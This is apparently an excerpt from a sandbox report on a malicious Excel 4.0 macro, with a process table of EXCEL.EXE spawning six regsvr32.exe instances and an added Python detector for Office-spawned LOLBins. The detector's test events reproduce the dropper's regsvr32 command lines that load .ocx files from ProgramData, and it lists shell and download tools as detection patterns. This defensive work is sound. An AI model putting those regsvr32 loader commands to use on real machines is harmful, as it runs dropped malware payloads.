The Commandline field is empty for all seven processes in this report. The six regsvr32.exe instances, one per EXEC row of the macro, start within two seconds of each other about three minutes after EXCEL.EXE, after the last of the failed download attempts under Network Behavior.
Start time | Start date | Path | Wow64 process (32bit) | Imagebase | File size | MD5 hash | Has elevated privileges | Has administrator privileges | Programmed in | Reputation |
---|---|---|---|---|---|---|---|---|---|---|
08:22:13 | 02/12/2021 | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | false | 0x13f970000 | 28253536 bytes | D53B85E21886D2AF9815C377537BCAC3 | true | true | C, C++ or other language | high |
08:25:05 | 02/12/2021 | C:\Windows\System32\regsvr32.exe | false | 0xffcb0000 | 19456 bytes | 59BCE9F07985F8A4204F4D6554CFF708 | true | true | C, C++ or other language | high |
08:25:05 | 02/12/2021 | C:\Windows\System32\regsvr32.exe | false | 0xffcb0000 | 19456 bytes | 59BCE9F07985F8A4204F4D6554CFF708 | true | true | C, C++ or other language | high |
08:25:05 | 02/12/2021 | C:\Windows\System32\regsvr32.exe | false | 0xffcb0000 | 19456 bytes | 59BCE9F07985F8A4204F4D6554CFF708 | true | true | C, C++ or other language | high |
08:25:06 | 02/12/2021 | C:\Windows\System32\regsvr32.exe | false | 0xffcb0000 | 19456 bytes | 59BCE9F07985F8A4204F4D6554CFF708 | true | true | C, C++ or other language | high |
08:25:06 | 02/12/2021 | C:\Windows\System32\regsvr32.exe | false | 0xffcb0000 | 19456 bytes | 59BCE9F07985F8A4204F4D6554CFF708 | true | true | C, C++ or other language | high |
08:25:07 | 02/12/2021 | C:\Windows\System32\regsvr32.exe | false | 0xffcb0000 | 19456 bytes | 59BCE9F07985F8A4204F4D6554CFF708 | true | true | C, C++ or other language | high |
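A detection for the chain recorded above (EXCEL.EXE launching regsvr32.exe against C:\ProgramData\Volet*.ocx), written as an added example for this page rather than taken from Joe Sandbox or from the Sigma rule itself. It reimplements the parent/child pairing behind the Sigma "Microsoft Office Product Spawning Windows Shell" hit over constructed Sysmon-style process-creation records and layers regsvr32-specific indicators on top. The image lists are an abbreviated approximation of the upstream rule (an assumption; consult the Sigma repository for the authoritative lists), and the command lines of the two Excel-spawned events are what the EXEC cells in the Macro 4.0 Code section would produce, because the report itself records no command lines.

```python
"""Flag Office processes spawning regsvr32 (and other LOLBins) from process-creation events.

Added example for this page; not Joe Sandbox code and not the Sigma rule itself.
The image lists approximate the Sigma "Microsoft Office Product Spawning Windows
Shell" rule family (assumption: the upstream lists are longer and may differ).
"""
import re
from typing import Dict, List, Optional

OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe",
                  "mspub.exe", "visio.exe", "msaccess.exe", "onenote.exe"}
SHELL_CHILDREN = {"cmd.exe", "powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe",
                  "mshta.exe", "rundll32.exe", "regsvr32.exe", "schtasks.exe", "wmic.exe",
                  "msiexec.exe", "certutil.exe", "bitsadmin.exe"}
# Locations a user-level dropper can write to; a COM server registered from here by Office is suspect.
USER_WRITABLE = ("\\programdata\\", "\\users\\", "\\temp\\", "\\appdata\\")

# Constructed Sysmon-style (event ID 1) records. The first two mirror the
# EXCEL.EXE -> regsvr32.exe chain in this report with the command lines the
# macro's EXEC cells would produce; the remaining three are benign controls.
EVENTS = [
    {"ParentImage": r"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE",
     "Image": r"C:\Windows\System32\regsvr32.exe",
     "CommandLine": r"regsvr32 C:\ProgramData\Volet1.ocx"},
    {"ParentImage": r"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE",
     "Image": r"C:\Windows\System32\regsvr32.exe",
     "CommandLine": r"regsvr32 -e -n -i:&Tiposa!G22& C:\ProgramData\Volet4.ocx"},
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\regsvr32.exe",
     "CommandLine": r'regsvr32 /s "C:\Program Files\Vendor\plugin.dll"'},
    {"ParentImage": r"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE",
     "Image": r"C:\Windows\splwow64.exe",
     "CommandLine": r"C:\Windows\splwow64.exe 12288"},
    {"ParentImage": r"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE",
     "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"cmd /c whoami"},
]


def basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def tokenize(cmdline: str) -> List[str]:
    """Split a Windows command line, keeping quoted paths with spaces together."""
    return [t.strip('"') for t in re.findall(r'"[^"]*"|\S+', cmdline)]


def office_spawns_shell(ev: Dict[str, str]) -> bool:
    """The parent/child pairing the Sigma rule alerts on."""
    return basename(ev["ParentImage"]) in OFFICE_PARENTS and basename(ev["Image"]) in SHELL_CHILDREN


def regsvr32_indicators(ev: Dict[str, str]) -> List[str]:
    """Why a regsvr32 invocation looks like a dropper stage rather than a software install."""
    if basename(ev["Image"]) != "regsvr32.exe":
        return []
    toks = tokenize(ev["CommandLine"])[1:]  # drop argv[0]
    flags = [t.lower() for t in toks if t[:1] in ("-", "/")]
    modules = [t for t in toks if t[:1] not in ("-", "/")]
    hits = []
    for mod in modules:
        low = mod.lower()
        if any(d in low for d in USER_WRITABLE):
            hits.append(f"module under user-writable path: {mod}")
        if not low.endswith(".dll"):
            hits.append(f"module without .dll extension: {mod}")
    if any(f.startswith(("-i:", "/i:")) for f in flags):
        hits.append("-i: passes a string to DllInstall")
    if "-n" in flags or "/n" in flags:
        hits.append("-n skips DllRegisterServer (DllInstall only)")
    return hits


def evaluate(ev: Dict[str, str]) -> Optional[Dict[str, object]]:
    """None when the rule does not fire; otherwise the hit with severity and indicators."""
    if not office_spawns_shell(ev):
        return None
    indicators = regsvr32_indicators(ev)
    return {"parent": basename(ev["ParentImage"]), "child": basename(ev["Image"]),
            "severity": "high" if indicators else "medium", "indicators": indicators}


def run(events=EVENTS) -> List[Optional[Dict[str, object]]]:
    return [evaluate(ev) for ev in events]


if __name__ == "__main__":
    for ev, hit in zip(EVENTS, run()):
        print(hit["severity"] if hit else "-", ev["CommandLine"], hit["indicators"] if hit else "")
```

The two Excel-spawned events score high; the explorer-launched registration of a vendor DLL under Program Files and the Word print helper do not fire, and Word spawning cmd.exe fires at medium with no regsvr32 indicators. An .ocx extension is legitimate for ActiveX controls and -i: is documented regsvr32 behaviour, so neither indicator is an alert on its own; it is the combination with an Office parent and a module under ProgramData that justifies the severity.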
Disassembly |
---|
Code Analysis |
---|
Executed Functions |
---|
Non-executed Functions |
---|
Function | Relevance | Instructions | Source | Uniqueness Score |
---|---|---|---|---|
02E966F3 | .9 | 946 (COMMON) | memory dump | -1.00% |
02E966E8 | .9 | 935 (COMMON) | memory dump | -1.00% |
02E96753 | .9 | 925 (COMMON) | memory dump | -1.00% |
02E96743 | .9 | 909 (COMMON) | memory dump | -1.00% |
02E9CF01 | .6 | 623 (COMMON) | memory dump | -1.00% |
02E96340 | .4 | 355 (COMMON) | memory dump | -1.00% |